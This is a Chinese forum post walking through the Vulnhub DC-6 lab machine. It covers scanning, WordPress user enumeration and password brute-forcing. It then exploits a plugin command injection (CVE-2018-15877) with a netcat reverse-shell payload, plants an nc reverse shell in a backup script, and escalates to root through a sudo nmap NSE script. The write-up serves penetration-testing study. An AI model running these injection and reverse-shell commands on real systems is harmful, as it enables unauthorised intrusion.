Vulnhub靶机DC系列-DC6

Delina · 发表于 2021-11-2 20:03:12

原文链接：Vulnhub靶机DC系列-DC6

DC-6

????：DC-6，还是熟悉的wordpress，还是左右横跳的弹shell

???? 0x01准备

1、下载DC-6 https://www.five86.com/downloads/DC-6.zip

2、安装DC-6到虚拟机，并把DC-6的网络设置net模式，方便寻找存活主机

kali：192.168.44.128

DC-6：192.168.44.139

????‍♂️好像一切都进行得挺顺利的呢，那就开始吧

????0x02 HACKING！！！

┌──(root????r00t)-[/home/r00t]

└─# arp-scan -l

Interface: eth0, type: EN10MB, MAC: 00:0c:29:f2:d7:dd, IPv4: 192.168.44.128

Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)

192.168.44.1 00:50:56:c0:00:08 VMware, Inc.

192.168.44.2 00:50:56:f8:c2:19 VMware, Inc.

192.168.44.139 00:0c:29:e0:77:1d VMware, Inc.

192.168.44.254 00:50:56:fb:1b:65 VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel

Ending arp-scan 1.9.7: 256 hosts scanned in 3.150 seconds (81.27 hosts/sec). 4 responded

┌──(root????r00t)-[/home/r00t]

└─#

┌──(root????r00t)-[/home/r00t]

└─# nmap -T4 -A -p- 192.168.44.139

Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-30 21:13 CST

Nmap scan report for 192.168.44.139

Host is up (0.0090s latency).

Not shown: 65533 closed ports

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)

| ssh-hostkey:

| 2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)

| 256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)

|_ 256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)

80/tcp open http Apache httpd 2.4.25 ((Debian))

|_http-server-header: Apache/2.4.25 (Debian)

|_http-title: Did not follow redirect to http://wordy/

MAC Address: 00:0C:29:E0:77:1D (VMware)

Device type: general purpose

Running: Linux 3.X|4.X

OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4

OS details: Linux 3.2 - 4.9

Network Distance: 1 hop

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE

HOP RTT ADDRESS

1 9.00 ms 192.168.44.139

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 33.19 seconds

看到上面开放的端口访问看看

可以看到还没有添加靶机的hosts去解析，Windows/Linux；

????现在可以正常访问了，该站很明显是用wordpress建的

Shell

┌──(root????r00t)-[/home/r00t]

└─# wpscan --url http://wordy/ -e u

WARNING: Nokogiri was built against libxml version 2.9.10, but has dynamically loaded 2.9.12

_______________________________________________________________

__ _______ _____

\ \ / / __ \ / ____|

\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®

\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \

\ /\ / | | ____) | (__| (_| | | | |

\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team

Version 3.8.18

Sponsored by Automattic - https://automattic.com/

@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart

_______________________________________________________________

It seems like you have not updated the database for some time.

[?] Do you want to update now? [Y]es [N]o, default: [N]N

[+] URL: http://wordy/ [192.168.44.139]

[+] Started: Sat Oct 30 21:43:06 2021

Interesting Finding(s):

[+] Headers

| Interesting Entry: Server: Apache/2.4.25 (Debian)

| Found By: Headers (Passive Detection)

| Confidence: 100%

[+] XML-RPC seems to be enabled: http://wordy/xmlrpc.php

| Found By: Direct Access (Aggressive Detection)

| Confidence: 100%

| References:

|  - http://codex.wordpress.org/XML-RPC_Pingback_API

|  - https://www.rapid7.com/db/module ... ress_ghost_scanner/

|  - https://www.rapid7.com/db/module ... rdpress_xmlrpc_dos/

|  - https://www.rapid7.com/db/module ... press_xmlrpc_login/

|  - https://www.rapid7.com/db/module ... ss_pingback_access/

[+] WordPress readme found: http://wordy/readme.html

| Found By: Direct Access (Aggressive Detection)

| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://wordy/wp-cron.php

| Found By: Direct Access (Aggressive Detection)

| Confidence: 60%

| References:

|  - https://www.iplocation.net/defend-wordpress-from-ddos

|  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).

| Found By: Rss Generator (Passive Detection)

|  - http://wordy/index.php/feed/,https://wordpress.org/?v=5.1.1

|  - http://wordy/index.php/comments/feed/,https://wordpress.org/?v=5.1.1

[+] WordPress theme in use: twentyseventeen

| Location: http://wordy/wp-content/themes/twentyseventeen/

| Last Updated: 2021-07-22T00:00:00.000Z

| Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt

| [!] The version is out of date, the latest version is 2.8

| Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1

| Style Name: Twenty Seventeen

| Style URI: https://wordpress.org/themes/twentyseventeen/

| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...

| Author: the WordPress team

| Author URI: https://wordpress.org/

|

| Found By: Css Style In Homepage (Passive Detection)

|

| Version: 2.1 (80% confidence)

| Found By: Style (Passive Detection)

|  - http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1, Match: 'Version: 2.1'

[+] Enumerating Users (via Passive and Aggressive Methods)

Brute Forcing Author IDs - Time: 00:00:00 <> (0 / 10)  0.00%  ETA: ? Brute Forcing Author IDs - Time: 00:00:00 <> (1 / 10) 10.00%  ETA: 0 Brute Forcing Author IDs - Time: 00:00:00 <> (2 / 10) 20.00%  ETA: 0 Brute Forcing Author IDs - Time: 00:00:00 <> (3 / 10) 30.00%  ETA: 0 Brute Forcing Author IDs - Time: 00:00:00 <> (4 / 10) 40.00%  ETA: 0 Brute Forcing Author IDs - Time: 00:00:00 <> (5 / 10) 50.00%  ETA: 0 Brute Forcing Author IDs - Time: 00:00:00 <> (6 / 10) 60.00%  ETA: 0 Brute Forcing Author IDs - Time: 00:00:00 <> (7 / 10) 70.00%  ETA: 0 Brute Forcing Author IDs - Time: 00:00:00 <> (9 / 10) 90.00%  ETA: 0 Brute Forcing Author IDs - Time: 00:00:00 <> (10 / 10) 100.00% Time: 00:00:00

User(s) Identified:

[+] admin

| Found By: Rss Generator (Passive Detection)

| Confirmed By:

|  Wp Json Api (Aggressive Detection)

| - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1

|  Author Id Brute Forcing - Author Pattern (Aggressive Detection)

|  Login Error Messages (Aggressive Detection)

[+] jens

| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

| Confirmed By: Login Error Messages (Aggressive Detection)

[+] graham

| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

| Confirmed By: Login Error Messages (Aggressive Detection)

[+] mark

| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

| Confirmed By: Login Error Messages (Aggressive Detection)

[+] sarah

| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

| Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.

[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Oct 30 21:43:12 2021

[+] Requests Done: 62

[+] Cached Requests: 6

[+] Data Sent: 14.865 KB

[+] Data Received: 641.26 KB

[+] Memory used: 161.676 MB

[+] Elapsed time: 00:00:06

搜集好用户名并保存到user.txt，以及字典是从/usr/share/wordlists里面找，跟着所给的线索把rockyou.txt里含有k01的字段重新写进新建的passwords.txt里面去

┌──(root????r00t)-[/usr/share/wordlists]

└─# ls

dirb dirbuster fasttrack.txt fern-wifi metasploit nmap.lst rockyou.txt.gz wfuzz

┌──(root????r00t)-[/usr/share/wordlists]

└─# gzip -d rockyou.txt.gz

┌──(root????r00t)-[/usr/share/wordlists]

└─# ls

dirb dirbuster fasttrack.txt fern-wifi metasploit nmap.lst rockyou.txt wfuzz

┌──(root????r00t)-[/usr/share/wordlists]

└─# cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

????现在有了user.txt和passwords.txt，可以跑一下了

????找到了，用户名为mark，密码为helpdesk01

可以看到这是用了插件，去网上搜这个远程命令执行漏洞的复现有大把(CVE-2018-15877)

这里我多啰嗦几种反弹，无关顺序

1、查找相关漏洞searchsploit activity monitor

????配置改一下

????监听开启

????弹指一瞬间

2、& 或者用Buripsuite重放的方法进行执行命令反弹shell

重放

&或者直接在输入框执行

因为这里被限制长度了，去审查元素修改把数值随便改即可

baidu | nc 192.168.44.128 6666 -e /bin/bash

shell看起来又shit了；python -c 'import pty;pty.spawn("/bin/bash")'

????好多了呢

现在来到/home目录下，看看他们分别都藏了什么线索

????用户名：graham 密码：GSo7isUM1D4，然后在jens用户目录下有个打包备份的脚本；先进行用户的切换

可以看到jens下的backups.sh是免密权限运行，意味在backups.sh里插入一个反弹shell并执行的话会反弹jens的shell会话

echo 'nc 192.168.44.128 996 -e /bin/bash' > backups.sh

????然后再查看一下权限

可以看到是可以使用root权限免密运行，还是和刚刚的思路一样，也是把shell呢进行反弹，因为nmap能够执行脚本功能，直接把/bin/sh写进/tmp/xxx.nse，然后让nmap运行它就可以直接提权

echo 'os.execute("/bin/sh")' > /tmp/xxx.nsesudo nmap --script=/tmp/xxx.nse

三、总结

wordpress插件漏洞查找
多用户相互反弹会话
半路上车提权shell

		自动登录	找回密码
密码			立即注册